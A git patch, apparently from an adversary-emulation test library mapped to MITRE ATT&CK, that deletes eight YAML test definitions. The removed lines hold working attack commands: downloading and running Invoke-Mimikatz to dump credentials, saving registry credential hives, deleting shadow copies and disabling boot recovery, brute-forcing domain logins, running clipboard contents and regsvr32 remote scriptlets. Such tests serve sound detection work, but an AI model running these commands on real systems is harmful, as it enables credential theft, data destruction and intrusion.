From 5ed4e5e795076ac9232a278df31a44de975a9d8e Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Sat, 12 May 2018 14:51:01 -0600
Subject: [PATCH] clean up
---
 atomics/t1002/t1002.yaml | 43 ----------
 atomics/t1003/t1003.yaml | 58 --------------
 atomics/t1107/t1107.yaml | 155 ------------------------------------
 atomics/t1110/t1110.yaml | 35 ---------
 atomics/t1113/t1113.yaml | 66 ----------------
 atomics/t1115/t1115.yaml | 27 -------
 atomics/t1117/RegSvr32.sct | 23 ------
 atomics/t1117/t1117.yaml | 45 -----------
 8 files changed, 452 deletions(-)
 delete mode 100644 atomics/t1002/t1002.yaml
 delete mode 100644 atomics/t1003/t1003.yaml
 delete mode 100644 atomics/t1107/t1107.yaml
 delete mode 100644 atomics/t1110/t1110.yaml
 delete mode 100644 atomics/t1113/t1113.yaml
 delete mode 100644 atomics/t1115/t1115.yaml
 delete mode 100644 atomics/t1117/RegSvr32.sct
 delete mode 100644 atomics/t1117/t1117.yaml
diff --git a/atomics/t1002/t1002.yaml b/atomics/t1002/t1002.yaml
deleted file mode 100644
index d7448dbd..00000000
--- a/atomics/t1002/t1002.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
---- -attack_technique: T1002 -display_name: Data Compressed - -atomic_tests: -- name: Compress Data for Exfiltration With PowerShell - description: | - TODO - supported_platforms: - - windows - input_arguments: - input_file: - description: Path that should be compressed into our output file - type: Path - default: C:\* - output_file: - description: Path where resulting compressed data should be placed - type: Path - default: C:\test\Data.zip - executor: - name: powershell - command: | - dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - -- name: Compress Data for Exfiltration With Rar - description: | - TODO - supported_platforms: - - windows - input_argument: - input_file: - description: Path that should be compressed into our output file - type: Path - default: "*.docx" - output_file: - description: Path where resulting compressed data should be placed - type: Path - default: exfilthis.rar - executor: - name: powershell - command: | - rar a -r #{output_file} #{input_file} -
\ No newline at end of file
diff --git a/atomics/t1003/t1003.yaml b/atomics/t1003/t1003.yaml
deleted file mode 100644
index 2226eac7..00000000
--- a/atomics/t1003/t1003.yaml
+++ /dev/null
@@ -1,58 +0,0 @@
---- -attack_technique: T1003 -display_name: Credential Dumping - -atomic_tests: -- name: Powershell Mimikatz - description: | - Dumps Credentials via Powershell by invoking a remote mimikatz script - supported_platforms: - - windows - input_arguments: - remote_script: - description: URL to a remote Mimikatz script that dumps credentials - type: Url - default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: - name: powershell - command: | - IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds - -- name: Gsecdump - description: | - https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 - supported_platforms: - - windows - executor: - name: command_prompt - command: | - gsecdump -a - -- name: Windows Credential Editor - description: | - http://www.ampliasecurity.com/research/windows-credentials-editor/ - supported_platforms: - - windows - input_argument: - output_file: - description: Path where resulting data should be placed - type: Path - default: output.txt - executor: - name: command_prompt - command: | - wce -o #{output_file} - -- name: Registry dump of SAM, creds, and secrets - description: | - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated - via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 - supported_platforms: - - windows - executor: - name: command_prompt - command: | - reg save HKLM\sam sam - reg save HKLM\system system - reg save HKLM\security security -
diff --git a/atomics/t1107/t1107.yaml b/atomics/t1107/t1107.yaml
deleted file mode 100644
index 0f8baae8..00000000
--- a/atomics/t1107/t1107.yaml
+++ /dev/null
@@ -1,155 +0,0 @@
---- -attack_technique: T1107 -display_name: File Deletion - -atomic_tests: -- name: Victim configuration - description: | - Create a temporary directory and several files on the victim system for later deletion - supported_platforms: - - linux - executor: - name: sh - command: | - mkdir /tmp/victim-files - cd /tmp/victim-files - touch a b c d e f g - echo "This file will be shredded" > /tmp/victim-shred.txt - -- name: Delete a single file - description: | - Delete a single file from the temporary directory - supported_platforms: - - linux - executor: - name: sh - command: | - rm -f /tmp/victim-files/a - -- name: Delete an entire folder - description: | - Recursively delete the temporary directory and all files contained within it - supported_platforms: - - linux - executor: - name: sh - command: | - rm -rf /tmp/victim-files - -- name: Overwrite and delete a file with shred - description: | - Use the `shred` command to overwrite the temporary file and then delete it - supported_platforms: - - linux - executor: - name: sh - command: | - shred -u /tmp/victim-shred.txt - -- name: Victim configuration - description: | - Create a temporary directory and several files on the victim system for later deletion - supported_platforms: - - windows - executor: - name: command_prompt - command: | - mkdir %TEMP%\victim-files-cmd - cd %TEMP%\victim-files-cmd - type nul > a - type nul > b - type nul > c - type nul > d - type nul > e - type nul > f - type nul > g - mkdir %TEMP%\victim-files-ps - cd %TEMP%\victim-files-ps - type nul > a - type nul > b - type nul > c - type nul > d - type nul > e - type nul > f - type nul > g - -- name: Delete a single file - cmd - description: | - Delete a single file from the temporary directory using cmd.exe - supported_platforms: - - windows - executor: - name: command_prompt - command: | - del /f %TEMP%\victim-files-cmd\a - -- name: Delete an entire folder - cmd - description: | - Recursively delete the temporary directory and 
all files contained within it using cmd.exe - supported_platforms: - - windows - executor: - name: command_prompt - command: | - del /f /S %TEMP%\victim-files-cmd - -- name: Delete a single file - ps - description: | - Delete a single file from the temporary directory using Powershell - supported_platforms: - - windows - executor: - name: powershell - command: | - Remove-Item -path %TEMP%\victim-files-ps\a - -- name: Delete an entire folder - ps - description: | - Recursively delete the temporary directory and all files contained within it using Powershell - supported_platforms: - - windows - executor: - name: powershell - command: | - Remove-Item -path %TEMP%\victim-files-ps -recurse - -- name: Delete VSS - vssadmin - description: | - Delete all volume shadow copies with vssadmin.exe - supported_platforms: - - windows - executor: - name: command_prompt - command: | - vssadmin.exe Delete Shadows /All /Quiet - -- name: Delete VSS - wmic - description: | - Delete all volume shadow copies with wmic - supported_platforms: - - windows - executor: - name: command_prompt - command: | - wmic shadowcopy delete - -- name: bcdedit - description: | - xxx - supported_platforms: - - windows - executor: - name: command_prompt - command: | - bcdedit /set {default} bootstatuspolicy ignoreallfailures - bcdedit /set {default} recoveryenabled no - -- name: wbadmin - description: | - xxx - supported_platforms: - - windows - executor: - name: command_prompt - command: | - wbdadmin delete catalog -quiet
\ No newline at end of file
diff --git a/atomics/t1110/t1110.yaml b/atomics/t1110/t1110.yaml
deleted file mode 100644
index c04adfb5..00000000
--- a/atomics/t1110/t1110.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
---- -attack_technique: T1110 -display_name: Brute Force Credential Access - -atomic_tests: -- name: Brute Force Credentials - description: | - Creates username and password files then attempts to brute force on remote host - supported_platforms: - - windows - input_arguments: - input_file_users: - description: Path to a file containing a list of users that we will attempt to brute force - type: Path - default: DomainUsers.txt - input_file_passwords: - description: Path to a file containing a list of passwords we will attempt to brute force with - type: Path - default: passwords.txt - remote_host: - description: Hostname of the target system we will brute force upon - type: String - default: \\COMPANYDC1\IPC$ - domain: - description: Domain name of the target system we will brute force upon - type: String - default: YOUR_COMPANY - executor: - name: command_prompt - command: | - net user /domain > #{input_file_users} - echo "Password1" >> #{input_file_passwords} - echo "1q2w3e4r" >> #{input_file_passwords} - echo "Password!" >> #{input_file_passwords} - @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
\ No newline at end of file
diff --git a/atomics/t1113/t1113.yaml b/atomics/t1113/t1113.yaml
deleted file mode 100644
index e365b5dd..00000000
--- a/atomics/t1113/t1113.yaml
+++ /dev/null
@@ -1,66 +0,0 @@
---- -attack_technique: T1113 -display_name: Screen Capture - -atomic_tests: -- name: Screencapture - description: | - Use screencapture command to collect a full desktop screenshot - supported_platforms: - - macos - input_arguments: - output_file: - description: | - xxx - type: Path - default: desktop.png - executor: - name: bash - command: screencapture #{output_file} - -- name: Screencapture (silent) - description: | - Use screencapture command to collect a full desktop screenshot - supported_platforms: - - macos - input_arguments: - output_file: - description: | - xxx - type: Path - default: desktop.png - executor: - name: bash - command: screencapture -x #{output_file} - -- name: X Windows Capture - description: | - Use xwd command to collect a full desktop screenshot and review file with xwud - supported_platforms: - - linux - input_arguments: - output_file: - description: | - xxx - type: Path - default: desktop.xwd - executor: - name: bash - command: | - xwd -root -out #{output_file} - xwud -in #{output_file} - -- name: Import - description: | - Use import command to collect a full desktop screenshot - supported_platforms: - - linux - input_arguments: - output_file: - description: | - xxx - type: Path - default: desktop.png - executor: - name: bash - command: import -window root #{output_file}
\ No newline at end of file
diff --git a/atomics/t1115/t1115.yaml b/atomics/t1115/t1115.yaml
deleted file mode 100644
index 1a6208ff..00000000
--- a/atomics/t1115/t1115.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
---- -attack_technique: T1115 -display_name: Clipboard Data -attack_link: https://attack.mitre.org/wiki/Technique/T1115 - -atomic_tests: -- name: Utilize Clipboard to store or execute commands from - description: | - Add data to clipboard to copy off or execute commands from. - supported_platforms: - - windows - executor: - name: command_prompt - command: | - dir | clip - clip < readme.txt - -- name: PowerShell - description: | - Utilize PowerShell to echo a command to clipboard and execute it - supported_platforms: - - windows - executor: - name: powershell - command: | - echo Get-Process | clip - Get-Clipboard | iex
\ No newline at end of file
diff --git a/atomics/t1117/RegSvr32.sct b/atomics/t1117/RegSvr32.sct
deleted file mode 100644
index 697938ed..00000000
--- a/atomics/t1117/RegSvr32.sct
+++ /dev/null
@@ -1,23 +0,0 @@
- - - - - - - - - - - - - -
diff --git a/atomics/t1117/t1117.yaml b/atomics/t1117/t1117.yaml
deleted file mode 100644
index 6d2b88bb..00000000
--- a/atomics/t1117/t1117.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-attack_technique: T1117 -display_name: Regsvr32 -atomic_tests: -- name: Regsvr32 local COM scriptlet execution - description: | - Regsvr32.exe is a command-line program used to register and unregister OLE controls - supported_platforms: - - windows - input_arguments: - filename: - description: Name of the local file, include path. - type: Path - default: Regsvr32.sct - executor: - name: command_prompt - command: | - regsvr32.exe /s /u /i:#(unknown) scrobj.dll -- name: Regsvr32 remote COM scriptlet execution - description: | - Regsvr32.exe is a command-line program used to register and unregister OLE controls - supported_platforms: - - windows - input_arguments: - url: - description: URL to hosted sct file - type: Url - default: http://www.example.com/file.sct - executor: - name: command_prompt - command: | - regsvr32.exe /s /u /i:#{url} scrobj.dll -- name: Regsvr32 local DLL execution - description: | - Regsvr32.exe is a command-line program used to register and unregister OLE controls - supported_platforms: - - windows - input_arguments: - dll_name: - description: Name of DLL to Execute, DLL Should export DllRegisterServer - type: Path - default: payload.dll - executor: - name: command_prompt - command: | - regsvr32.exe {dll_name}